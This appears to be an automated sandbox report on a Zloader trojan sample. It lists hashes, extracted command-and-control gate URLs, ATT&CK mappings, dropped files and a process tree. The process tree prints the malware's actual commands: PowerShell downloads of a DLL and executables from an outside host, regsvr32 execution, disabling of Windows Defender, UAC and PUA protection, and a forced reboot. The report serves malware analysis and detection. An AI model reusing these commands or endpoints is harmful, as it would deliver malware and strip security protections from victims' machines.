zloader | 197473ef9099e43c74fc5dd19776cb4e001ccd39102c38c3bfa3f81db9fd92bb

Analysis

max time kernel
46s
max time network
166s
platform
windows7_x64
resource
win7v20210408
submitted
15-08-2021 11:10

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

397eb08dc1794600fdd0c4744c2aeb12.exe
Size

165KB
MD5

397eb08dc1794600fdd0c4744c2aeb12
SHA1

5e7b7419c58ed1322917144efaa1b6ba87086b67
SHA256

197473ef9099e43c74fc5dd19776cb4e001ccd39102c38c3bfa3f81db9fd92bb
SHA512

669b705f38b7614e14957368048c590a82673c52c8281d3bd0c3d4d77f398d4f65fbbccc3a1e284579149432e26942e3b52df8876d83267f0ac4fc8974b94e69

Score

10^/10

zloader vasja vasja botnet persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 1344 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

368 regsvr32.exe

flow	pid	process
5	1344	powershell.exe

pid	process
368	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

397eb08dc1794600fdd0c4744c2aeb12.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	397eb08dc1794600fdd0c4744c2aeb12.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	397eb08dc1794600fdd0c4744c2aeb12.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1620 timeout.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

regsvr32.exe

pid process

112 regsvr32.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1344 powershell.exe
1344 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1344 powershell.exe

pid	process
1620	timeout.exe

pid	process
112	regsvr32.exe

pid	process
1344	powershell.exe
1344	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1344	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

397eb08dc1794600fdd0c4744c2aeb12.execmd.exeregsvr32.exe

description	pid	process	target process
PID 2000 wrote to memory of 1336	2000	397eb08dc1794600fdd0c4744c2aeb12.exe	cmd.exe
PID 2000 wrote to memory of 1336	2000	397eb08dc1794600fdd0c4744c2aeb12.exe	cmd.exe
PID 2000 wrote to memory of 1336	2000	397eb08dc1794600fdd0c4744c2aeb12.exe	cmd.exe
PID 1336 wrote to memory of 1344	1336	cmd.exe	powershell.exe
PID 1336 wrote to memory of 1344	1336	cmd.exe	powershell.exe
PID 1336 wrote to memory of 1344	1336	cmd.exe	powershell.exe
PID 1336 wrote to memory of 112	1336	cmd.exe	regsvr32.exe
PID 1336 wrote to memory of 112	1336	cmd.exe	regsvr32.exe
PID 1336 wrote to memory of 112	1336	cmd.exe	regsvr32.exe
PID 1336 wrote to memory of 112	1336	cmd.exe	regsvr32.exe
PID 1336 wrote to memory of 112	1336	cmd.exe	regsvr32.exe
PID 112 wrote to memory of 368	112	regsvr32.exe	regsvr32.exe
PID 112 wrote to memory of 368	112	regsvr32.exe	regsvr32.exe
PID 112 wrote to memory of 368	112	regsvr32.exe	regsvr32.exe
PID 112 wrote to memory of 368	112	regsvr32.exe	regsvr32.exe
PID 112 wrote to memory of 368	112	regsvr32.exe	regsvr32.exe
PID 112 wrote to memory of 368	112	regsvr32.exe	regsvr32.exe
PID 112 wrote to memory of 368	112	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\397eb08dc1794600fdd0c4744c2aeb12.exe
"C:\Users\Admin\AppData\Local\Temp\397eb08dc1794600fdd0c4744c2aeb12.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\system32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/JavaN.dll -OutFile JavaN.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1344

C:\Windows\system32\regsvr32.exe
regsvr32 JavaN.dll
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:112

C:\Windows\SysWOW64\regsvr32.exe
JavaN.dll
4⤵
- Loads dropped DLL
PID:368

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:1160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:1824

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:1796

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
4⤵
PID:1988

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:700

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:1960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat
4⤵
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
4⤵
PID:1040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
4⤵
PID:1656

C:\Windows\system32\shutdown.exe
shutdown.exe /r /f /t 00
4⤵
PID:1544

C:\Windows\system32\timeout.exe
timeout 16
3⤵
- Delays execution with timeout.exe
PID:1620

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:1184

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:372

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1928

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
0a35b9f570720c390a6b6f31391cdc9d

SHA1
5aa586131d1419ab1d022c8d4c441a45c9d11f95

SHA256
255404c9d1f5d1d00299a7de2c8793f4ac194c81c59bc3c5aabe0f3603b6b095

SHA512
b22a91a566b88b5b4c3c65c07a5545273fbe9c9ef3f9bb7e4d43399083a1a3918f80f5491fbcfa40c9d565f688fc9bcdf11f767cda76cc7f39c9362cbcf1f638

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
e19a61e9b27aaa153d4349fd3ae1eab7

SHA1
40270d03db738df8e1ada6d4af83758e13b16a5f

SHA256
548734b528695841401ad73a76496355483ff5c51967a846cb4d6e51e04f03fc

SHA512
7ad1f90497ced0f288d846ef4d37aca98df54ae0fd5501be60bd691f8cb40cd752f652e9d1785cf26865266533207e5a4cd6dd339ce6f6d564c4557f965790c6

Download Submit
C:\Users\Admin\AppData\Roaming\JavaN.dll
MD5
40935d0671be0444d3c5271b56734e58

SHA1
a034003808a14db6a181d2965375c65141459b56

SHA256
cf957ff480387afbdd378623d8f212440cfee360bc862eff39c4703225e4b8f8

SHA512
449a12fabce95fc7aa9bd7029dc69b1b21e74fbb81d152350696440d928fd4df060fe07a8dd1c34e6a5561045105597939471c4dd5f136bdfab3a025b91cec51

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
6d7d1b0e8962cf82275aef08bda85fef

SHA1
9130d8a3b5aa9b9435d4c920cf81676f397b3f77

SHA256
8230931ecbb6b786043855b370d7e3f2504f87c4fed795cec597ab51f8d0137e

SHA512
f1db16fa774aead8d27dcf6165a619c2bcce35f70d9675d60dea93bd6e57a85f3e218e9f39aff1d16aaafb19202e4b7b54fe9a4627011aa57922e347cc0c12f8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
6d7d1b0e8962cf82275aef08bda85fef

SHA1
9130d8a3b5aa9b9435d4c920cf81676f397b3f77

SHA256
8230931ecbb6b786043855b370d7e3f2504f87c4fed795cec597ab51f8d0137e

SHA512
f1db16fa774aead8d27dcf6165a619c2bcce35f70d9675d60dea93bd6e57a85f3e218e9f39aff1d16aaafb19202e4b7b54fe9a4627011aa57922e347cc0c12f8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
6d7d1b0e8962cf82275aef08bda85fef

SHA1
9130d8a3b5aa9b9435d4c920cf81676f397b3f77

SHA256
8230931ecbb6b786043855b370d7e3f2504f87c4fed795cec597ab51f8d0137e

SHA512
f1db16fa774aead8d27dcf6165a619c2bcce35f70d9675d60dea93bd6e57a85f3e218e9f39aff1d16aaafb19202e4b7b54fe9a4627011aa57922e347cc0c12f8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
6d7d1b0e8962cf82275aef08bda85fef

SHA1
9130d8a3b5aa9b9435d4c920cf81676f397b3f77

SHA256
8230931ecbb6b786043855b370d7e3f2504f87c4fed795cec597ab51f8d0137e

SHA512
f1db16fa774aead8d27dcf6165a619c2bcce35f70d9675d60dea93bd6e57a85f3e218e9f39aff1d16aaafb19202e4b7b54fe9a4627011aa57922e347cc0c12f8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
6d7d1b0e8962cf82275aef08bda85fef

SHA1
9130d8a3b5aa9b9435d4c920cf81676f397b3f77

SHA256
8230931ecbb6b786043855b370d7e3f2504f87c4fed795cec597ab51f8d0137e

SHA512
f1db16fa774aead8d27dcf6165a619c2bcce35f70d9675d60dea93bd6e57a85f3e218e9f39aff1d16aaafb19202e4b7b54fe9a4627011aa57922e347cc0c12f8

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
6f10d512d4cbb527fd26ae266d0a4aef

SHA1
6e42d51ff2d42c5f999943b329a655e901ea4b32

SHA256
b37efaf69f5484fd2e4ec9c83553b9788e39a10fc4390065c29d59f770f34943

SHA512
4f66e8435b8439ace551ad8a70483926891ff3f55b27688602b2e0c58999054bd430308879374f4e8c990a91c3e9cc9cd78b6d355d4370051528bce536e1028e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\JavaN.dll
MD5
40935d0671be0444d3c5271b56734e58

SHA1
a034003808a14db6a181d2965375c65141459b56

SHA256
cf957ff480387afbdd378623d8f212440cfee360bc862eff39c4703225e4b8f8

SHA512
449a12fabce95fc7aa9bd7029dc69b1b21e74fbb81d152350696440d928fd4df060fe07a8dd1c34e6a5561045105597939471c4dd5f136bdfab3a025b91cec51

Download Submit
\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
memory/112-72-0x0000000000000000-mapping.dmp

Download
memory/368-79-0x0000000010000000-0x0000000010121000-memory.dmp

Filesize
1.1MB

Download
memory/368-75-0x0000000000000000-mapping.dmp

Download
memory/368-78-0x0000000000150000-0x0000000000151000-memory.dmp

Filesize
4KB

Download
memory/368-76-0x0000000075D11000-0x0000000075D13000-memory.dmp

Filesize
8KB

Download
memory/372-166-0x0000000002880000-0x0000000002881000-memory.dmp

Filesize
4KB

Download
memory/700-109-0x0000000000000000-mapping.dmp

Download
memory/968-96-0x0000000000000000-mapping.dmp

Download
memory/1040-135-0x000000001AA90000-0x000000001AA91000-memory.dmp

Filesize
4KB

Download
memory/1040-133-0x000000001AB54000-0x000000001AB56000-memory.dmp

Filesize
8KB

Download
memory/1040-132-0x000000001AB50000-0x000000001AB52000-memory.dmp

Filesize
8KB

Download
memory/1040-126-0x0000000000000000-mapping.dmp

Download
memory/1160-88-0x0000000000090000-0x00000000000B6000-memory.dmp

Filesize
152KB

Download
memory/1160-80-0x0000000000000000-mapping.dmp

Download
memory/1184-165-0x0000000000000000-mapping.dmp

Download
memory/1336-61-0x0000000000000000-mapping.dmp

Download
memory/1344-67-0x000000001A970000-0x000000001A972000-memory.dmp

Filesize
8KB

Download
memory/1344-69-0x000000001A8C0000-0x000000001A8C1000-memory.dmp

Filesize
4KB

Download
memory/1344-71-0x000000001B6A0000-0x000000001B6A1000-memory.dmp

Filesize
4KB

Download
memory/1344-70-0x000000001A8F0000-0x000000001A8F1000-memory.dmp

Filesize
4KB

Download
memory/1344-66-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

Filesize
4KB

Download
memory/1344-63-0x0000000000000000-mapping.dmp

Download
memory/1344-68-0x000000001A974000-0x000000001A976000-memory.dmp

Filesize
8KB

Download
memory/1344-65-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download
memory/1544-162-0x0000000000000000-mapping.dmp

Download
memory/1620-164-0x0000000000000000-mapping.dmp

Download
memory/1656-145-0x0000000002760000-0x0000000002761000-memory.dmp

Filesize
4KB

Download
memory/1656-143-0x000000001ACF0000-0x000000001ACF2000-memory.dmp

Filesize
8KB

Download
memory/1656-144-0x000000001ACF4000-0x000000001ACF6000-memory.dmp

Filesize
8KB

Download
memory/1656-136-0x0000000000000000-mapping.dmp

Download
memory/1656-148-0x000000001AA30000-0x000000001AA31000-memory.dmp

Filesize
4KB

Download
memory/1656-160-0x00000000026C0000-0x00000000026C1000-memory.dmp

Filesize
4KB

Download
memory/1656-161-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/1796-94-0x0000000000000000-mapping.dmp

Download
memory/1824-86-0x000000001ABE0000-0x000000001ABE1000-memory.dmp

Filesize
4KB

Download
memory/1824-85-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/1824-91-0x0000000002800000-0x0000000002801000-memory.dmp

Filesize
4KB

Download
memory/1824-90-0x0000000002630000-0x0000000002631000-memory.dmp

Filesize
4KB

Download
memory/1824-89-0x000000001AB64000-0x000000001AB66000-memory.dmp

Filesize
8KB

Download
memory/1824-87-0x000000001AB60000-0x000000001AB62000-memory.dmp

Filesize
8KB

Download
memory/1824-93-0x000000001C460000-0x000000001C461000-memory.dmp

Filesize
4KB

Download
memory/1824-81-0x0000000000000000-mapping.dmp

Download
memory/1928-168-0x00000000026E0000-0x00000000026E1000-memory.dmp

Filesize
4KB

Download
memory/1960-113-0x0000000000000000-mapping.dmp

Download
memory/1964-121-0x000000001AAE0000-0x000000001AAE2000-memory.dmp

Filesize
8KB

Download
memory/1964-122-0x000000001AAE4000-0x000000001AAE6000-memory.dmp

Filesize
8KB

Download
memory/1964-116-0x0000000000000000-mapping.dmp

Download
memory/1988-107-0x000000001B620000-0x000000001B621000-memory.dmp

Filesize
4KB

Download
memory/1988-104-0x000000001AB20000-0x000000001AB22000-memory.dmp

Filesize
8KB

Download
memory/1988-103-0x00000000023B0000-0x00000000023B1000-memory.dmp

Filesize
4KB

Download
memory/1988-102-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

Filesize
4KB

Download
memory/1988-101-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download
memory/1988-97-0x0000000000000000-mapping.dmp

Download
memory/1988-105-0x000000001AB24000-0x000000001AB26000-memory.dmp

Filesize
8KB

Download
memory/1988-106-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/2000-60-0x000007FEFC251000-0x000007FEFC253000-memory.dmp

Filesize
8KB

Download